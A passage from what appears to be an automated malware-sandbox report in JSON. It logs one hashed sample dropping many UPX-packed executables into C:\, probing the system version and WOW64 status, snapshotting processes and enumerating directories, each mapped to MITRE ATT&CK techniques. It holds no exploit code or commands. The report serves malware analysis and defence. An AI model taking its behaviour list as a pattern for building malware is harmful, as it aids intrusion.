\"0600240.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0600240.exe]- [targetUID: 00000000-00004404]\n \"266028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\266028.exe]- [targetUID: 00000000-00003728]\n \"2262446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2262446.exe]- [targetUID: 00000000-00003448]\n \"0600220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0600220.exe]- [targetUID: 00000000-00003448]\n \"6040442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6040442.exe]- [targetUID: 00000000-00002732]\n \"682244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\682244.exe]- [targetUID: 00000000-00003668]\n \"jxtxdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxtxdv.exe]- [targetUID: 00000000-00003668]\n \"jpdvr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jpdvr.exe]- [targetUID: 00000000-00002896]\n \"vnjvhvr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnjvhvr.exe]- [targetUID: 00000000-00002380]\n \"pfffth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pfffth.exe]- [targetUID: 00000000-00002380]\n \"xlfpx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xlfpx.exe]- [targetUID: 00000000-00002960]\n \"64660.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64660.exe]- [targetUID: 00000000-00005560]\n \"8224062.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8224062.exe]- [targetUID: 00000000-00005560]\n \"btvxfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\btvxfh.exe]- [targetUID: 00000000-00005976]\n \"dnppt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dnppt.exe]- [targetUID: 00000000-00006120]\n \"vdfxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vdfxt.exe]- [targetUID: 00000000-00002612]\n \"trdvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trdvh.exe]- [targetUID: 00000000-00002612]\n \"jbdbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jbdbn.exe]- [targetUID: 00000000-00004224]\n \"rbldl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbldl.exe]- [targetUID: 00000000-00004224]\n \"62242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62242.exe]- [targetUID: 00000000-00006088]\n \"68282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\68282.exe]- [targetUID: 00000000-00004308]\n \"xlbdxlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xlbdxlx.exe]- [targetUID: 00000000-00004308]\n \"nrdvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrdvp.exe]- [targetUID: 00000000-00005988]\n \"bbhhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bbhhn.exe]- [targetUID: 00000000-00005876]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c0088f11c0083f11c00000000000000000000001500000000011ce312000000000080f0120095e1bc770d270700feffffff435cc0775059c077aa000000b800000082f11c0080f11c00a4e41200dce81200000000000000000000000000000000000000000000000000001a0000000015001c5cbf7760d8ae75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edc077aaf11c00a06a967586000000a4e41200dce812000000000086008800a06a9675a4e41200916c9675aaf11c00a06a9675a06a967514e9120002020000 (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005880)\n \"bbhhn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"bbhhn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000034004828340043283400000000000000000000002c00000000011ce312000000000080f0120095e1bc77e4250700feffffff435cc0775059c077aa000000b80000004228340040283400a4e41200dce81200000000000000000000000000000000000000000000000000e019000000002c001c5cbf7760d8ae75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edc0776a283400a06a967586000000a4e41200dce812000000000086008800a06a9675a4e41200916c96756a283400a06a9675a06a967514e9120002020000 (UID: 00000000-00005876)\n \"bbhhn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"nrdvp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400882a3400832a3400000000000000000000002c00000000011ce312000000000080f0120095e1bc77902a0700feffffff435cc0775059c077aa000000b8000000822a3400802a3400a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cbf7760d8ae75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edc077aa2a3400a06a967586000000a4e41200dce812000000000086008800a06a9675a4e41200916c9675aa2a3400a06a9675a06a967514e9120002020000 (UID: 00000000-00005988)\n \"nrdvp.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005988)\n \"xlbdxlx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004308)\n \"xlbdxlx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370050ac37004bac3700000000000000000000003000000000011ce312000000000080f0120095e1bc7799290700feffffff435cc0775059c077aa000000b80000004aac370048ac3700a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000030001c5cbf7760d8ae75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edc07772ac3700a06a967586000000a4e41200dce812000000000086008800a06a9675a4e41200916c967572ac3700a06a9675a06a967514e9120002020000 (UID: 00000000-00004308)\n \"xlbdxlx.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004308)\n \"68282.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006088)\n \"68282.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000280030ac28002bac2800000000000000000000002100000000011ce312000000000080f0120095e1bc77092f0700feffffff435cc0775059c077aa000000b80000002aac280028ac2800a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000021001c5cbf7760d8ae75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edc07752ac2800a06a967586000000a4e41200dce812000000000086008800a06a9675a4e41200916c967552ac2800a06a9675a06a967514e9120002020000 (UID: 00000000-00006088)\n \"68282.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006088)\n \"62242.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"62242.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f0088ac2f0083ac2f00000000000000000000002800000000011ce312000000000080f0120095e1bc77892c0700feffffff435cc0775059c077aa000000b800000082ac2f0080ac2f00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cbf7760d8ae75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edc077aaac2f00a06a967586000000a4e41200dce812000000000086008800a06a9675a4e41200916c9675aaac2f00a06a9675a06a967514e9120002020000 (UID: 00000000-00005996)\n \"62242.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"rbldl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004224)\n \"rbldl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f0068ac2f0063ac2f00000000000000000000002800000000011ce312000000000080f0120095e1bc7724570700feffffff435cc0775059c077aa000000b800000062ac2f0060ac2f00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000028001c5cbf7760d8ae75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edc0778aac2f00a06a967586000000a4e41200dce812000000000086008800a06a9675a4e41200916c96758aac2f00a06a9675a06a967514e9120002020000 (UID: 00000000-00004224)\n \"rbldl.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004224)\n \"jbdbn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000037003829370033293700000000000000000000002f00000000011ce312000000000080f0120095e1bc77335a0700feffffff435cc0775059c077aa000000b80000003229370030293700a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cbf7760d8ae75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edc0775a293700a06a967586000000a4e41200dce812000000000086008800a06a9675a4e41200916c96755a293700a06a9675a06a967514e9120002020000 (UID: 00000000-00006112)\n \"jbdbn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006112)\n \"trdvh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002612)\n \"trdvh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000230028b4230023b4230000000000000000000000210000000001ecdf12000000000050ed120095e1bc77cb580700feffffff435cc0775059c077aa000000b800000022b4230020b4230074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5cbf7760d8ae75ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096edc0774ab42300a06a96758600000074e11200ace512000000000086008800a06a967574e11200916c96754ab42300a06a9675a06a9675e4e5120002020000 (UID: 00000000-00002612)\n \"trdvh.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002612)\n \"vdfxt.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000b8261f00b3261f00000000000000000000001c0000000001ecdf12000000000050ed120095e1bc77455d0700feffffff435cc0775059c077aa000000b8000000b2261f00b0261f0074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5cbf7760d8ae75ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096edc077da261f00a06a96758600000074e11200ace512000000000086008800a06a967574e11200916c9675da261f00a06a9675a06a9675e4e5120002020000 (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"bbhhn.exe\" called \"IsWow64Process\" with parameter \"5876\" - (UID: 00000000-00005876)\n \"xlbdxlx.exe\" called \"IsWow64Process\" with parameter \"4308\" - (UID: 00000000-00004308)\n \"68282.exe\" called \"IsWow64Process\" with parameter \"6088\" - (UID: 00000000-00006088)\n \"62242.exe\" called \"IsWow64Process\" with parameter \"5996\" - (UID: 00000000-00005996)\n \"rbldl.exe\" called \"IsWow64Process\" with parameter \"4224\" - (UID: 00000000-00004224)\n \"trdvh.exe\" called \"IsWow64Process\" with parameter \"2612\" - (UID: 00000000-00002612)\n \"dnppt.exe\" called \"IsWow64Process\" with parameter \"4300\" - (UID: 00000000-00004300)\n \"btvxfh.exe\" called \"IsWow64Process\" with parameter \"5976\" - (UID: 00000000-00005976)\n \"8224062.exe\" called \"IsWow64Process\" with parameter \"5560\" - (UID: 00000000-00005560)\n \"64660.exe\" called \"IsWow64Process\" with parameter \"4376\" - (UID: 00000000-00004376)\n \"xlfpx.exe\" called \"IsWow64Process\" with parameter \"2960\" - (UID: 00000000-00002960)\n \"pfffth.exe\" called \"IsWow64Process\" with parameter \"2380\" - (UID: 00000000-00002380)\n \"jpdvr.exe\" called \"IsWow64Process\" with parameter \"2896\" - (UID: 00000000-00002896)\n \"682244.exe\" called \"IsWow64Process\" with parameter \"2824\" - (UID: 00000000-00002824)\n \"hppjr.exe\" called \"IsWow64Process\" with parameter \"4420\" - (UID: 00000000-00004420)\n \"jjxfht.exe\" called \"IsWow64Process\" with parameter \"3224\" - (UID: 00000000-00003224)\n \"fvnph.exe\" called \"IsWow64Process\" with parameter \"4268\" - (UID: 00000000-00004268)\n \"42600.exe\" called \"IsWow64Process\" with parameter \"976\" - (UID: 00000000-00000976)\n \"40806.exe\" called \"IsWow64Process\" with parameter \"4264\" - (UID: 00000000-00004264)\n \"62046.exe\" called \"IsWow64Process\" with parameter \"332\" - (UID: 00000000-00000332)\n \"pdhnvj.exe\" called \"IsWow64Process\" with parameter \"3460\" - (UID: 00000000-00003460)\n \"tjxjxxh.exe\" called \"IsWow64Process\" with parameter \"4084\" - (UID: 00000000-00004084)\n \"rnftf.exe\" called \"IsWow64Process\" with parameter \"3804\" - (UID: 00000000-00003804)\n \"nvfdf.exe\" called \"IsWow64Process\" with parameter \"3180\" - (UID: 00000000-00003180)\n \"88806.exe\" called \"IsWow64Process\" with parameter \"3176\" - (UID: 00000000-00003176)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"bbhhn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xlbdxlx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"68282.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"62242.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rbldl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"trdvh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dnppt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"btvxfh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8224062.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"64660.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xlfpx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pfffth.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jpdvr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"682244.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hppjr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jjxfht.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fvnph.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"42600.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"40806.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"62046.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pdhnvj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tjxjxxh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rnftf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nvfdf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"88806.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter 5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter bbhhn.exe (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005880)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005880)\n \"bbhhn.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005876)\n \"bbhhn.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005876)\n \"bbhhn.exe\" called \"FindNextFileW\" with parameter 5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe (UID: 00000000-00005876)\n \"bbhhn.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has an entrypoint in section \"UPX1\"\n \"bphvxnd.exe\" has an entrypoint in section \"UPX1\"\n \"ndjtrh.exe\" has an entrypoint in section \"UPX1\"\n \"lhfrhnr.exe\" has an entrypoint in section \"UPX1\"\n \"482064.exe\" has an entrypoint in section \"UPX1\"\n \"202048.exe\" has an entrypoint in section \"UPX1\"\n \"48866.exe\" has an entrypoint in section \"UPX1\"\n \"hrffr.exe\" has an entrypoint in section \"UPX1\"\n \"nfbjp.exe\" has an entrypoint in section \"UPX1\"\n \"6064442.exe\" has an entrypoint in section \"UPX1\"\n \"44424.exe\" has an entrypoint in section \"UPX1\"\n \"pdjrtdv.exe\" has an entrypoint in section \"UPX1\"\n \"bvffnn.exe\" has an entrypoint in section \"UPX1\"\n \"fplrrnr.exe\" has an entrypoint in section \"UPX1\"\n \"lrnlbrl.exe\" has an entrypoint in section \"UPX1\"\n \"0086084.exe\" has an entrypoint in section \"UPX1\"\n \"22004.exe\" has an entrypoint in section \"UPX1\"\n \"4688248.exe\" has an entrypoint in section \"UPX1\"\n 